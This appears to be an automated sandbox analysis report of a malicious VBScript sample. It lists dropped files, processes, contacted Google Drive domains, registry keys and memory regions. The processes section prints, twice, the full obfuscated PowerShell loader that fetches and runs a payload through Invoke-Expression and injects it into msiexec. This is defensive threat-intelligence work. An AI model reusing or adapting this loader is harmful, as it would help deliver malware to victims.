Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
r20240913TRANSFERENCIA.vbs
|
ASCII text, with very long lines (352), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msiexec.exe_fd9a2f4f1029bc37267a198198cc734fbe50_cf6c61e8_df6de71e-5110-4331-aa1a-483f03f8b1f2\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC57C.tmp.dmp
|
Mini DuMP crash report, 14 streams, Tue Oct 1 13:52:57 2024, 0x1205a4 type
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC917.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC938.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2j1dqkfk.1vk.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2scbleco.jes.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ccr0qhz5.fub.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yjci1ghq.ux1.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Nonpunctuating.sem
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
There are 2 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\r20240913TRANSFERENCIA.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Bldningsforstyrrelser Bushwhacked Rkebiskoppers Johnsen Inkompetencers
Urubu Brandsikkerheden #>;$Ottetals='bluett';<#Samkvemsrets Polydactylous Skemaden Vkstcentret Forsorgslederens #>;$Erstatningspligts40=$host.PrivateData;If
($Erstatningspligts40) {$Skallesmkkernes++;}function Virksomhedskategoris($Molossian){$Arbejdsdatabasen=$knsttelserne+$Molossian.Length-$Skallesmkkernes;for(
$Nedsivningsbekendtgrelsers=4;$Nedsivningsbekendtgrelsers -lt $Arbejdsdatabasen;$Nedsivningsbekendtgrelsers+=5){$Shaftment='Refrygtigere';$Udlaanssal+=$Molossian[$Nedsivningsbekendtgrelsers];}$Udlaanssal;}function
Crustaceology($Afdelingsingenirers){ & ($Ileitis) ($Afdelingsingenirers);}$Aarstalslisters=Virksomhedskategoris 'Rea.MRedaoRsonzVariiUddrlEddelBedaaTrip/
Des5Abso. Pi.0 Pie Knu(Bl,eW nciiFoalnSterdD meoT.mtw,ispsAl a SubiN.andTgald Fatu1Tud 0 Inu. Tr 0 Ser;data UnnoWSubsiharvnOtos6Doug4Folk;roko
S,rexf,er6St.l4Mani;Pri SenrDermvBeha:Skav1Nuns2Libe1Trib.Co a0Fo k) S.i SejGI treBillcAudakFr.ioTyra/Ku s2Misk0Ops 1Ebra0
Ka 0Vari1Bar,0Biot1Taxa Ls nFWooli rbernor e GulfUdnyoRefexButi/U,ny1 Eft2Malc1 De .Pant0Besr ';$Hjlpemenuen=Virksomhedskategoris
'VibrUSignsCh tEPrieRN pt-F ypaFngsGA,ceERadinSamftSkre ';$Stolet111=Virksomhedskategoris 'La,ehPremtSchit Afkpsteds Sod:
Ran/Ulid/Sv edD.sarP.eciBrudvSupeeMiso. scagTreeoSpiroA,sugBe klThoreFr.g. daac StaopaulmRavn/ VanuPrioc.pal? AfpeTegnxDodep
StioMyrirgu rtRuna=Nos d ,taoPoppwMed nE enlJerno AndaP podSush&CrimiMaandPaga=Comp1Gamm0Spekm hoSWag dP esA Thr5Vill8 R
ntG,grH ondF SupDPrio2MiljBv ndo amguHustrOzonBSpec_ Ce wFolkMAfskx ejlOvervBenzC Old-.lefLAfsvJ Jinj,oppwGa.orOutp4UlemRPiaz
';$Skovvogns134=Virksomhedskategoris 'E.ke>Razo ';$Ileitis=Virksomhedskategoris 'ProsiAbsceOut,X D s ';$Historicoreligious='Maffia';$Ornerily='\Nonpunctuating.sem';Crustaceology
(Virksomhedskategoris 'unde$ Ti gSnkelOmsto ParbOli a TillAwig:.ranSGry,a HalnKnapd Brue erts L d= Und$TegneTropnTro,vG,ld:KunsaAst
pAfmepSmaldExscahomotRistaMicr+Trom$NormO NatrKontnProaeArberRegei SullNonayKons ');Crustaceology (Virksomhedskategoris '
I,t$sinugSamalSkolo Befb Unsa Misl Int: ykvSOr gnudv.uSnadd gnoeBillsTri kHemoaMormf S,etPenneKrent NorsO.os= Ott$Di.iSCr,wtPalsoGrunlIncoeA,tetU
de1Bilb1 ra1Trif.Sirss RappApprl Proir kot Nu (Mole$ChinS TrekStraoHo evAghovYngsoOvergP.ernAccrs Dia1Igno3R gr4Flum) ear
');Crustaceology (Virksomhedskategoris ' Con[ Tc NRadieS,avtArbi.PalaSUdsmeU rira kuvArsei AntcKomme AboPNoneo triTeran CaltJackMSnu
a ,kan .oraGen.g syeNongr bli] irt:Ove :BefeS Ma.e FigcPolyu Dy rHypeiSpi.tFl wyDeklPisoarGrdeo PentCiteoMinic Frio InklStro
Unra= Tyn Hydr[BradN Be eClust Ana.Do.aSCephe RedcbesvuTer rRomaiSig t EntySkumPDis r EntoPrestUdbuoHelicRetvoM.ndlD,unTKondyT
rep OuteSka ]Date:Sync:KretTMasslPo ys G.a1Appe2Flyg ');$Stolet111=$Snudeskaftets[0];$Gennemboring=(Virksomhedskategoris '
Div$ MllgFarfLaflyO K iBFurbaForsLPer :Bestc PerU .roBKessbSvalityktEPavls eh=circnEme,eBenvwPro -AskoO inbF rnJV nbEHo
ecRealtChec UngSS umyLnu sRe.rtHarpe dypM Lic.DiddnOmbueS mmtre i.Che W ewETil BUndeC AnbLVaryiL.ureResenAcrotSkat ');Crustaceology
($Gennemboring);Crustaceology (Virksomhedskategoris 'dus $AnodCVersuSulpb PribF,rmiTurneNedasFred.ConsHlgeueTotaaDepodGutsetmmerDamns.upe[Ansv$BehnHJur.jSperlSkifpoutseManimPsykeK
ytnMic uGa,geVildnCrim]stjn=Krlh$ NimATorta PrerL,ndsMulttSporaForsl alusRiorlAfriiSompsTilftLaseeAktirSi esM lo ');$Sampson=Virksomhedskategoris
' In,$TermCSka.uBoi.bSatybPrepiAfmaeSal.sOver. ,enD.riloJ bswBugmn H rlNondoSch a Sl.d odFPhosiB nkla umeVold( ong$BranSDa,atNoumo
A tlVenteSalut ,ls1.hyt1 pec1Visk,Efte$MaskPFiskoFllel edyDec,sCambo SlirStavbHercaVestt IneeTykm) an ';$Polysorbate=$Sandes;Crustaceology
(Virksomhedskategoris 'ta a$ ubtguforlMa iOL.gabD sca KunlDv,g: FrenPl,yUileuMAngeM BevUCod.SChat1Fo.n2Hold9Peri= Gen(GuraTchr
eTillST.ckTSoot-L vrPCutwaPlonTKreahVels oci$Op,rPFaa,oKontLNic.YTyresP jlOTyporWheaBadiaaLi htNo je isc)G er ');while (!$Nummus129)
{Crustaceology (Virksomhedskategoris 'Diop$FrasgFedtl.rono Repb kkvaSnaglDkni: rosP Of hProxoRes t.kjooTaurmUsdeaDigngfrihn
F,deUn mtPseui r bsLocam.yri= ,us$LinutTr,urSaunudisweOver ') ;Crustaceology $Sampson;Crustaceology (Virksomhedskategoris
'Til S UnitLa paObelr A ttPeri- a tS ,jolLrdaeA beeVek pMor. Pent4 E.s ');Crustaceology (Virksomhedskategoris 're n$BebugH
aslLibeoAbdobMuraa Pe,lC ru:G nsNTikkuBacim ensm StauMarks E i1fik.2P.ae9Elde= Fri(Ho fTAlleesy tsBidst ges-HagePNihiaUpbbtGagghAm
u Seck$Ant.PToppoSotilBefoyUndis entoResprTimebMayoaTopit BeteToba) one ') ;Crustaceology (Virksomhedskategoris ' stn$Sgesg,nfalPersoC,osbDrosaFlitlejen:LuftSModelEfteoKarlw
RanfCharoMis.x ,rde Re r yvt=Po,t$Di,hgMedelBabyoOph b NefaDilllForb: D,nfvagroRottlCan k aaePlurkOverr mog+ be.+Opse% She$
MunSDislnBecuuBonedGuldeTa esSparkC.opaF,brfTim tCloceEgoitVe,msCirc.Hy,ocArcaoAdmiuAdlin BaltIman ') ;$Stolet111=$Snudeskaftets[$Slowfoxer];}$Relinquishers=275628;$Henvejres=30508;Crustaceology
(Virksomhedskategoris 'Q,in$ Jo gTranlPl.toHetebAfsbaD cil B n:Fiskd LitePrelmSystiAfgitSegmrCoo aProliGenenDybd Tsi=Regr
wagG Pree Burt E a-TranCEmbro.unenLagrt.ewseRatanPeckt ac Tops$CullPMe lo H plOzony .ntsD stoDe orMejsbRe.saE tetBlode eco
');Crustaceology (Virksomhedskategoris 'Bort$PatrgCordlMunioFedebVsenaThorlStil:UndsT Pl,rMerpiPurtcTe.ru SyvsKulmpKal i Uigd
BehaCh ntVan,eLo s D av= Kam Ac.e[Hed.S ariyOmnosMa,otPaase TemmSmun.SnylCryg.oEubtnBallvGavleM.lercasst Ska]Hnde:Chee: SkuFT
lsrKommoE lamTilrB,ladaObsescente ing6 Bjr4 alpSForst,ptrr aneiUnd.nMadogMoms(Unso$Torkd oddeHrelmBladi tiktDiapr laga VeriForhnnow
)B au ');Crustaceology (Virksomhedskategoris ' ol$ BesgScrelB rgoThrobStudast alForn:YppeKRi eoundevNat e E.snLa.adFor.i
isknS.ragIn fe Andn ravsAn,r Dann=Seni Adst[telmS MasyUdstsD ritShyfeDioimlun,.F reTChefeDirexRoust Ma,.chamEPasqnNyspcOxteo
R wdCit iorannRe,egpass]Inds: er:DecoAFlekSGam CD oeIBuckIfler.G liGPlaseg,ootpe iSSluptArisrFormiForunRe ngArme(Arki$ venT
ortrTailiTilsc,taguE.orsAggrpInfeiBarkdGiftaAzimtLaste Tus)Elec ');Crustaceology (Virksomhedskategoris 'T kk$WullgO.erlArgyoH
ptbA tiaWan.lTurn:AminMKat itheosWaigoSurtmSamlaOpertEmbrhpard1Bevi9D st0 Ant=Oran$T ecK PepoAbb vForbeMos nF,dedWardiekspnGullgAnt
e orn cobs,eel.Trics nciuCannb EsosbusttpickrUds.i obln .ergCirk( Con$ErytRFamieBemelOv ri.espnF rsq lviu Preiincrs Co.h
SmrefritrBailsT gn, ss$teatHpolleTrannLysev.ible UnwjMentr ForeCei,sSphe)smul ');Crustaceology $Misomath190;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Bldningsforstyrrelser Bushwhacked Rkebiskoppers Johnsen Inkompetencers
Urubu Brandsikkerheden #>;$Ottetals='bluett';<#Samkvemsrets Polydactylous Skemaden Vkstcentret Forsorgslederens #>;$Erstatningspligts40=$host.PrivateData;If
($Erstatningspligts40) {$Skallesmkkernes++;}function Virksomhedskategoris($Molossian){$Arbejdsdatabasen=$knsttelserne+$Molossian.Length-$Skallesmkkernes;for(
$Nedsivningsbekendtgrelsers=4;$Nedsivningsbekendtgrelsers -lt $Arbejdsdatabasen;$Nedsivningsbekendtgrelsers+=5){$Shaftment='Refrygtigere';$Udlaanssal+=$Molossian[$Nedsivningsbekendtgrelsers];}$Udlaanssal;}function
Crustaceology($Afdelingsingenirers){ & ($Ileitis) ($Afdelingsingenirers);}$Aarstalslisters=Virksomhedskategoris 'Rea.MRedaoRsonzVariiUddrlEddelBedaaTrip/
Des5Abso. Pi.0 Pie Knu(Bl,eW nciiFoalnSterdD meoT.mtw,ispsAl a SubiN.andTgald Fatu1Tud 0 Inu. Tr 0 Ser;data UnnoWSubsiharvnOtos6Doug4Folk;roko
S,rexf,er6St.l4Mani;Pri SenrDermvBeha:Skav1Nuns2Libe1Trib.Co a0Fo k) S.i SejGI treBillcAudakFr.ioTyra/Ku s2Misk0Ops 1Ebra0
Ka 0Vari1Bar,0Biot1Taxa Ls nFWooli rbernor e GulfUdnyoRefexButi/U,ny1 Eft2Malc1 De .Pant0Besr ';$Hjlpemenuen=Virksomhedskategoris
'VibrUSignsCh tEPrieRN pt-F ypaFngsGA,ceERadinSamftSkre ';$Stolet111=Virksomhedskategoris 'La,ehPremtSchit Afkpsteds Sod:
Ran/Ulid/Sv edD.sarP.eciBrudvSupeeMiso. scagTreeoSpiroA,sugBe klThoreFr.g. daac StaopaulmRavn/ VanuPrioc.pal? AfpeTegnxDodep
StioMyrirgu rtRuna=Nos d ,taoPoppwMed nE enlJerno AndaP podSush&CrimiMaandPaga=Comp1Gamm0Spekm hoSWag dP esA Thr5Vill8 R
ntG,grH ondF SupDPrio2MiljBv ndo amguHustrOzonBSpec_ Ce wFolkMAfskx ejlOvervBenzC Old-.lefLAfsvJ Jinj,oppwGa.orOutp4UlemRPiaz
';$Skovvogns134=Virksomhedskategoris 'E.ke>Razo ';$Ileitis=Virksomhedskategoris 'ProsiAbsceOut,X D s ';$Historicoreligious='Maffia';$Ornerily='\Nonpunctuating.sem';Crustaceology
(Virksomhedskategoris 'unde$ Ti gSnkelOmsto ParbOli a TillAwig:.ranSGry,a HalnKnapd Brue erts L d= Und$TegneTropnTro,vG,ld:KunsaAst
pAfmepSmaldExscahomotRistaMicr+Trom$NormO NatrKontnProaeArberRegei SullNonayKons ');Crustaceology (Virksomhedskategoris '
I,t$sinugSamalSkolo Befb Unsa Misl Int: ykvSOr gnudv.uSnadd gnoeBillsTri kHemoaMormf S,etPenneKrent NorsO.os= Ott$Di.iSCr,wtPalsoGrunlIncoeA,tetU
de1Bilb1 ra1Trif.Sirss RappApprl Proir kot Nu (Mole$ChinS TrekStraoHo evAghovYngsoOvergP.ernAccrs Dia1Igno3R gr4Flum) ear
');Crustaceology (Virksomhedskategoris ' Con[ Tc NRadieS,avtArbi.PalaSUdsmeU rira kuvArsei AntcKomme AboPNoneo triTeran CaltJackMSnu
a ,kan .oraGen.g syeNongr bli] irt:Ove :BefeS Ma.e FigcPolyu Dy rHypeiSpi.tFl wyDeklPisoarGrdeo PentCiteoMinic Frio InklStro
Unra= Tyn Hydr[BradN Be eClust Ana.Do.aSCephe RedcbesvuTer rRomaiSig t EntySkumPDis r EntoPrestUdbuoHelicRetvoM.ndlD,unTKondyT
rep OuteSka ]Date:Sync:KretTMasslPo ys G.a1Appe2Flyg ');$Stolet111=$Snudeskaftets[0];$Gennemboring=(Virksomhedskategoris '
Div$ MllgFarfLaflyO K iBFurbaForsLPer :Bestc PerU .roBKessbSvalityktEPavls eh=circnEme,eBenvwPro -AskoO inbF rnJV nbEHo
ecRealtChec UngSS umyLnu sRe.rtHarpe dypM Lic.DiddnOmbueS mmtre i.Che W ewETil BUndeC AnbLVaryiL.ureResenAcrotSkat ');Crustaceology
($Gennemboring);Crustaceology (Virksomhedskategoris 'dus $AnodCVersuSulpb PribF,rmiTurneNedasFred.ConsHlgeueTotaaDepodGutsetmmerDamns.upe[Ansv$BehnHJur.jSperlSkifpoutseManimPsykeK
ytnMic uGa,geVildnCrim]stjn=Krlh$ NimATorta PrerL,ndsMulttSporaForsl alusRiorlAfriiSompsTilftLaseeAktirSi esM lo ');$Sampson=Virksomhedskategoris
' In,$TermCSka.uBoi.bSatybPrepiAfmaeSal.sOver. ,enD.riloJ bswBugmn H rlNondoSch a Sl.d odFPhosiB nkla umeVold( ong$BranSDa,atNoumo
A tlVenteSalut ,ls1.hyt1 pec1Visk,Efte$MaskPFiskoFllel edyDec,sCambo SlirStavbHercaVestt IneeTykm) an ';$Polysorbate=$Sandes;Crustaceology
(Virksomhedskategoris 'ta a$ ubtguforlMa iOL.gabD sca KunlDv,g: FrenPl,yUileuMAngeM BevUCod.SChat1Fo.n2Hold9Peri= Gen(GuraTchr
eTillST.ckTSoot-L vrPCutwaPlonTKreahVels oci$Op,rPFaa,oKontLNic.YTyresP jlOTyporWheaBadiaaLi htNo je isc)G er ');while (!$Nummus129)
{Crustaceology (Virksomhedskategoris 'Diop$FrasgFedtl.rono Repb kkvaSnaglDkni: rosP Of hProxoRes t.kjooTaurmUsdeaDigngfrihn
F,deUn mtPseui r bsLocam.yri= ,us$LinutTr,urSaunudisweOver ') ;Crustaceology $Sampson;Crustaceology (Virksomhedskategoris
'Til S UnitLa paObelr A ttPeri- a tS ,jolLrdaeA beeVek pMor. Pent4 E.s ');Crustaceology (Virksomhedskategoris 're n$BebugH
aslLibeoAbdobMuraa Pe,lC ru:G nsNTikkuBacim ensm StauMarks E i1fik.2P.ae9Elde= Fri(Ho fTAlleesy tsBidst ges-HagePNihiaUpbbtGagghAm
u Seck$Ant.PToppoSotilBefoyUndis entoResprTimebMayoaTopit BeteToba) one ') ;Crustaceology (Virksomhedskategoris ' stn$Sgesg,nfalPersoC,osbDrosaFlitlejen:LuftSModelEfteoKarlw
RanfCharoMis.x ,rde Re r yvt=Po,t$Di,hgMedelBabyoOph b NefaDilllForb: D,nfvagroRottlCan k aaePlurkOverr mog+ be.+Opse% She$
MunSDislnBecuuBonedGuldeTa esSparkC.opaF,brfTim tCloceEgoitVe,msCirc.Hy,ocArcaoAdmiuAdlin BaltIman ') ;$Stolet111=$Snudeskaftets[$Slowfoxer];}$Relinquishers=275628;$Henvejres=30508;Crustaceology
(Virksomhedskategoris 'Q,in$ Jo gTranlPl.toHetebAfsbaD cil B n:Fiskd LitePrelmSystiAfgitSegmrCoo aProliGenenDybd Tsi=Regr
wagG Pree Burt E a-TranCEmbro.unenLagrt.ewseRatanPeckt ac Tops$CullPMe lo H plOzony .ntsD stoDe orMejsbRe.saE tetBlode eco
');Crustaceology (Virksomhedskategoris 'Bort$PatrgCordlMunioFedebVsenaThorlStil:UndsT Pl,rMerpiPurtcTe.ru SyvsKulmpKal i Uigd
BehaCh ntVan,eLo s D av= Kam Ac.e[Hed.S ariyOmnosMa,otPaase TemmSmun.SnylCryg.oEubtnBallvGavleM.lercasst Ska]Hnde:Chee: SkuFT
lsrKommoE lamTilrB,ladaObsescente ing6 Bjr4 alpSForst,ptrr aneiUnd.nMadogMoms(Unso$Torkd oddeHrelmBladi tiktDiapr laga VeriForhnnow
)B au ');Crustaceology (Virksomhedskategoris ' ol$ BesgScrelB rgoThrobStudast alForn:YppeKRi eoundevNat e E.snLa.adFor.i
isknS.ragIn fe Andn ravsAn,r Dann=Seni Adst[telmS MasyUdstsD ritShyfeDioimlun,.F reTChefeDirexRoust Ma,.chamEPasqnNyspcOxteo
R wdCit iorannRe,egpass]Inds: er:DecoAFlekSGam CD oeIBuckIfler.G liGPlaseg,ootpe iSSluptArisrFormiForunRe ngArme(Arki$ venT
ortrTailiTilsc,taguE.orsAggrpInfeiBarkdGiftaAzimtLaste Tus)Elec ');Crustaceology (Virksomhedskategoris 'T kk$WullgO.erlArgyoH
ptbA tiaWan.lTurn:AminMKat itheosWaigoSurtmSamlaOpertEmbrhpard1Bevi9D st0 Ant=Oran$T ecK PepoAbb vForbeMos nF,dedWardiekspnGullgAnt
e orn cobs,eel.Trics nciuCannb EsosbusttpickrUds.i obln .ergCirk( Con$ErytRFamieBemelOv ri.espnF rsq lviu Preiincrs Co.h
SmrefritrBailsT gn, ss$teatHpolleTrannLysev.ible UnwjMentr ForeCei,sSphe)smul ');Crustaceology $Misomath190;"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 5792 -s 2284
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
https://go.m80;s$
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.m80;
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.googP
|
unknown
|
||
|
https://drive.usercontent.googh
|
unknown
|
||
|
https://drive.usercontent.google.com/
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
http://crl.micro
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://drive.google.com/o
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
https://drive.google.com/g
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://crl.v
|
unknown
|
There are 17 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
drive.google.com
|
216.58.206.78
|
||
|
drive.usercontent.google.com
|
142.250.184.193
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
142.250.184.193
|
drive.usercontent.google.com
|
United States
|
||
|
216.58.206.78
|
drive.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
9395000
|
direct allocation
|
page execute and read and write
|
|
|
|
2E06D66F000
|
trusted library allocation
|
page read and write
|
|
|
|
81C0000
|
direct allocation
|
page execute and read and write
|
|
|
|
53B4000
|
trusted library allocation
|
page read and write
|
|
|
|
2E05E475000
|
trusted library allocation
|
page read and write
|
||
|
6DDE000
|
heap
|
page read and write
|
||
|
21010000
|
heap
|
page read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
|
192E5AC4000
|
heap
|
page read and write
|
||
|
81D0000
|
direct allocation
|
page read and write
|
||
|
4496000
|
trusted library allocation
|
page read and write
|
||
|
192E5E2B000
|
heap
|
page read and write
|
||
|
7FF848E12000
|
trusted library allocation
|
page read and write
|
||
|
7FF848CE6000
|
trusted library allocation
|
page read and write
|
||
|
2E075CF7000
|
heap
|
page read and write
|
||
|
5860000
|
direct allocation
|
page read and write
|
||
|
2E05D601000
|
trusted library allocation
|
page read and write
|
||
|
6DFD000
|
heap
|
page read and write
|
||
|
7FF848E40000
|
trusted library allocation
|
page read and write
|
||
|
6F0000
|
trusted library section
|
page read and write
|
||
|
192E3C90000
|
heap
|
page read and write
|
||
|
20CAF000
|
stack
|
page read and write
|
||
|
2E05DAF6000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E20000
|
trusted library allocation
|
page execute and read and write
|
||
|
192E3D87000
|
heap
|
page read and write
|
||
|
7FF848D16000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E06D908000
|
trusted library allocation
|
page read and write
|
||
|
7EF0000
|
heap
|
page read and write
|
||
|
58A0000
|
direct allocation
|
page read and write
|
||
|
58B0000
|
direct allocation
|
page read and write
|
||
|
594A000
|
heap
|
page read and write
|
||
|
192E5E70000
|
heap
|
page read and write
|
||
|
53AE000
|
trusted library allocation
|
page read and write
|
||
|
FF970B6000
|
stack
|
page read and write
|
||
|
2E05D450000
|
heap
|
page read and write
|
||
|
192E5E5B000
|
heap
|
page read and write
|
||
|
192E5E38000
|
heap
|
page read and write
|
||
|
FF97E8D000
|
stack
|
page read and write
|
||
|
FF96EFE000
|
stack
|
page read and write
|
||
|
2E05BA20000
|
heap
|
page read and write
|
||
|
68B0000
|
direct allocation
|
page read and write
|
||
|
192E5E5C000
|
heap
|
page read and write
|
||
|
698A000
|
stack
|
page read and write
|
||
|
6F70000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E0759BC000
|
heap
|
page read and write
|
||
|
2E05F412000
|
trusted library allocation
|
page read and write
|
||
|
429E000
|
stack
|
page read and write
|
||
|
192E3D84000
|
heap
|
page read and write
|
||
|
2E05BD55000
|
heap
|
page read and write
|
||
|
704E000
|
stack
|
page read and write
|
||
|
70D0000
|
trusted library allocation
|
page read and write
|
||
|
192E3D84000
|
heap
|
page read and write
|
||
|
192E5AC8000
|
heap
|
page read and write
|
||
|
910000
|
trusted library allocation
|
page read and write
|
||
|
68E0000
|
direct allocation
|
page read and write
|
||
|
5850000
|
direct allocation
|
page read and write
|
||
|
7FF848CEC000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E075BF8000
|
heap
|
page read and write
|
||
|
20D0000
|
trusted library allocation
|
page read and write
|
||
|
2E05BB2E000
|
heap
|
page read and write
|
||
|
6E8000
|
heap
|
page read and write
|
||
|
7FF848C4B000
|
trusted library allocation
|
page read and write
|
||
|
8995000
|
direct allocation
|
page execute and read and write
|
||
|
7B60000
|
heap
|
page read and write
|
||
|
7150000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F50000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C3D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E05F40E000
|
trusted library allocation
|
page read and write
|
||
|
FF971B9000
|
stack
|
page read and write
|
||
|
192E3EA0000
|
heap
|
page read and write
|
||
|
7FF848F80000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F30000
|
trusted library allocation
|
page read and write
|
||
|
59B6000
|
heap
|
page read and write
|
||
|
6B00000
|
heap
|
page read and write
|
||
|
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
|
8A0000
|
trusted library section
|
page read and write
|
||
|
192E5AC2000
|
heap
|
page read and write
|
||
|
2E075BE4000
|
heap
|
page read and write
|
||
|
425C000
|
stack
|
page read and write
|
||
|
192E5AC9000
|
heap
|
page read and write
|
||
|
57CE000
|
stack
|
page read and write
|
||
|
2E075C22000
|
heap
|
page read and write
|
||
|
677E000
|
stack
|
page read and write
|
||
|
7F74000
|
heap
|
page read and write
|
||
|
2E075FD0000
|
heap
|
page read and write
|
||
|
4C9000
|
stack
|
page read and write
|
||
|
7FF848EE0000
|
trusted library allocation
|
page read and write
|
||
|
2E05DC42000
|
trusted library allocation
|
page read and write
|
||
|
6F10AFE000
|
stack
|
page read and write
|
||
|
192E5AC5000
|
heap
|
page read and write
|
||
|
192E5B0F000
|
heap
|
page read and write
|
||
|
2110E000
|
stack
|
page read and write
|
||
|
2E05BB06000
|
heap
|
page read and write
|
||
|
2E05F508000
|
trusted library allocation
|
page read and write
|
||
|
87F000
|
stack
|
page read and write
|
||
|
6900000
|
direct allocation
|
page read and write
|
||
|
2253000
|
unkown
|
page read and write
|
||
|
FF97139000
|
stack
|
page read and write
|
||
|
7090000
|
trusted library allocation
|
page read and write
|
||
|
70F0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E70000
|
trusted library allocation
|
page read and write
|
||
|
192E3CCF000
|
heap
|
page read and write
|
||
|
7C40000
|
trusted library allocation
|
page read and write
|
||
|
5910000
|
heap
|
page read and write
|
||
|
68A0000
|
direct allocation
|
page read and write
|
||
|
2E05BB61000
|
heap
|
page read and write
|
||
|
